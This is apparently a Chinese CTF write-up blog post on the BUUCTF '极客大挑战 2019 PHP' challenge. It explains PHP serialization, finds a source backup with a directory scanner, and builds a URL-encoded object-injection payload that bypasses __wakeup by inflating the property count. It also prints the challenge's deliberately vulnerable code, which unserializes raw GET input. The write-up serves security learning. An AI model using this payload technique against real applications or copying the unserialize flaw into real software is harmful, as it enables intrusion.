极客大挑战--PHP

最新推荐文章于 2024-03-06 13:55:18 发布
最新推荐文章于 2024-03-06 13:55:18 发布
阅读量307 收藏 1
点赞数
分类专栏: CTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43579362/article/details/108525138
版权

序列化与反序列化–serialize()+unserialize()

序列化:将复杂数据类型压缩到字符串中,数据类型包括字符串,数组,对象等,且在序列化对象的时候,只序列化变量,不会序列化对象的方法,所以序列化定义对象的类型在序列化之前定义。
private,public,protected对象在序列化的时候不相同

<?php
class Name{
	private $username1='admin';
	public $username2='admin';
	protected $username3='admin';
}
$a=new Name();
echo serialize($a);//O:4:"Name":3:{s:15:"Nameusername1";s:5:"admin";s:9:"username2";s:5:"admin";s:12:"*username3";s:5:"admin";}
**变量的值相同,但是序列化输出的值不一样**
echo "\n\n";
echo urlencode(serialize($a));//序列化private,protected变量之后会有\00产生,防止在赋值时该不可打印字符丢失
//O%3A4%3A%22Name%22%3A3%3A%7Bs%3A15%3A%22%00Name%00username1%22%3Bs%3A5%3A%22admin%22%3Bs%3A9%3A%22username2%22%3Bs%3A5%3A%22admin%22%3Bs%3A12%3A%22%00%2A%00username3%22%3Bs%3A5%3A%22admin%22%3B%7D
?>

反序列化
将字符串还原为原来的变量,如果所反序列化的对象中有__wakeup()函数会优先调用,然而该函数存在漏洞,当反序列化的属性个数大于实际属性个数时会跳过该函数执行。

极客大挑战-PHP

提示有备份文件,使用dirmap进行扫描

py -3 dirmap.py -i http://93bff45d-6f55-4b38-a70b-a1294a1aea74.node3.buuoj.cn/ -lcf

发现存在备份文件www.zip
在这里插入图片描述
下载下来,在这里插入图片描述
依次打开检查,发现class.php和flag.php有点东西

/// index.php里面的一段代码
   <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>
///class.php代码
<?php
include 'flag.php';
error_reporting(0);
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    function __wakeup(){
        $this->username = 'guest';
    }
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();         
        }
    }
}
?>
解释一下上面两处代码:
index.php先是将class.php包含进来,然后再将$_GET['select']传过来的字符串反序列化,而class.php里面有三个函数__wakeup(),__construct()-->相当于构造函数,__destruct()-->相当于析构函数,再对象销毁时自动调用,而该函数如果能满住一定条件会将$flag打印出来,但是__wakeup()如果不绕过那么一定无法满足$username='admin'的条件,上述内容已经讲述了如何绕过__wakeup()函数。

贴一个构造payload的php脚本

<?php
class Name{
	private $username='admin';
	private $password='100';
}
$a=new Name();
echo serialize($a);
echo "\n\n";
echo urlencode(serialize($a));//当然是选这个放在url栏
1 //O:4:"Name":2{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";} 
2
//O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
?>

最后再将结果2的属性值改为大于2的数就是最终payload了,

O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D

在这里插入图片描述

··KElis
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
挑战 2019 PHP
BlueDoorZz的博客
07-12 450
0x00 题型:源码泄露,php反序列化,wakeup方法的绕过。 0x01 提示网站有备份,直接在url后面拼接www.zip,下载到源码。主要代码如下: <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> <?php include 'flag.php'; error_reporting(0); class Name{
挑战php
weixin_52780973的博客
08-03 674
buuctf中的php
[挑战 2019]PHP
Knsec
05-18 2340
[挑战 2019]PHP
天池Apache Flink挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink挑战赛-垃圾图片分类算法源码+项目说明.zip
学院--Java Web
07-16
学院Java Web视频教程,仅供参考学习,有需要的可以下载,本人有全栈开发工程师各种学习技术视频教程及本档,有需要的可以留言或到本人账号下载
与团队-与团队1
08-03
前言“工程问题都很简单。人际关系才是最难的。——比尔·库格伦,前Google工程部资深副总裁生活中总是充满了离奇的转折,就好像我们俩从没想过会合作写一本软件工程
学院java-23种设计模式
06-21
在Java领域,23种设计模式被广泛接受,它们分为三大类:创建型、结构型和行为型。下面,我们将详细探讨这些设计模式以及它们在实际开发中的应用。 1. 创建型设计模式: - 单例模式(Singleton):确保一个类只有一...
虚拟光驱-v1.0.0.9
12-07
总的来说,虚拟光驱以其多格式支持和便捷的操作,为用户提供了虚拟光驱的解决方案,无论是安装操作系统、办公软件,还是游戏或其他应用程序,都能大地提高效率,减少对物理光驱的依赖。其简洁的界面和强大的...
[挑战 2019]PHP1
m0_62207480的博客
04-30 3424
知识点:1.网站的备份文件 2.php反序列化 发现三个php文件,其中index.php为主页源代码。 打开flag.php并未发现flag: 接着打开class.php: 里面涉及php魔法方法 __construct 是一种构造方法,在类实例化的时候,会自动调用该魔术方法,进行类的初始化; __wakeup 当使用unserialize时被调用,可用于做些对象的初始化操作 ...
[挑战 2019]PHP 1
m0_62879498的博客
04-12 6176
[挑战 2019]PHP 1 一进入题目,就有页面提示我们“所以我有一个良好的备份网站的习惯” 所以我们尝试着输入网站源码备份文件,看看能否访问 常见的网站源码备份文件后缀: tar.gz,zip,rar,tar 常见的网站源码备份文件名: web,website,backup,back,www,wwwroot,temp 发现www.zip可以成功获得网站源码备份 下载后,发现有3个php文件 我们先访问一下 index.php文件,发现: <?php include 'clas
[挑战 2019]PHP 1——php反序列化
weixin_51325053的博客
09-12 488
保存,然后获得序列化后的字符串:O:4:“Name”:2:{s:14:“Nameusername”;发现一段php文件,包含class.php文件,用get的方式传入一个select参数,并将结果反序列化(unserialize)我们将用这串序列化的字符串替换select,但问题是,当执行反序列(unserialize)时,会首先执行。在反序列化时,当前属性个数大于实际属性个数时,就会跳过__wakeup(),去执行__destruct。于是,我们直接回到网页,然后拼接www.zip于是我们就下载了源码,
[挑战 2019]PHP1-原创超详细
qq_58166735的博客
12-09 3093
php反序列化根据__destruct 析构函数(在这个对象的内容执行完之前 执行函数的内容)的内容可以得知,password=100,username=admin的时候满足条件就可以获得flag。扫出来www.zip这个文件,然后下载下来 ,里面只有index.php和class.php两个文件有作用。(img-WxhXrNIn-1670552259273)]但是发现这个里面有空格,所以把空格url编码变成%00再传参。我用的是top7777.txt字典,扫的很慢。获得flag,实验结束。
【网络安全 | CTF】CTF挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 4580
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
BUUCTF--挑战php
最新发布
woshicainiao666的博客
03-06 1161
www.zip。
【BUUCTF】[挑战 2019] PHP 清晰易懂详细总结 Writeup
algae
08-26 1945
【BUUCTF】[挑战 2019] PHP Writeup0x00 考点目录扫描源码泄露反序列化0x01 解题 0x00 考点 目录扫描 源码泄露 反序列化 0x01 解题 dirsearch -u 指定url -e 指定网站语言 -w 可以加上自己的字典(加上路径) -r 递归跑(查到一个目录后,在目录后重复跑,很慢,不建议用) python3 dirsearch.py -u http://26e0c1d7-d98e-4a34-9ffe-901887297fb5.node3.buuoj.cn
buuctf 挑战2019php
08-24
buuctf 挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的展示等。序列化是指将对象转化为字符串的过程,而反序列化则是将字符串转化为对象的过程。在PHP中,可以使用serialize()函数进行序列化,并使用var_dump()函数进行反序列化结果的展示。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [阿里云IoT创新挑战赛.pdf](https://download.csdn.net/download/weixin_38744375/11634853)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [【BUUCTF-Web】 [挑战 2019]PHP](https://blog.csdn.net/m0_51683653/article/details/126693573)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值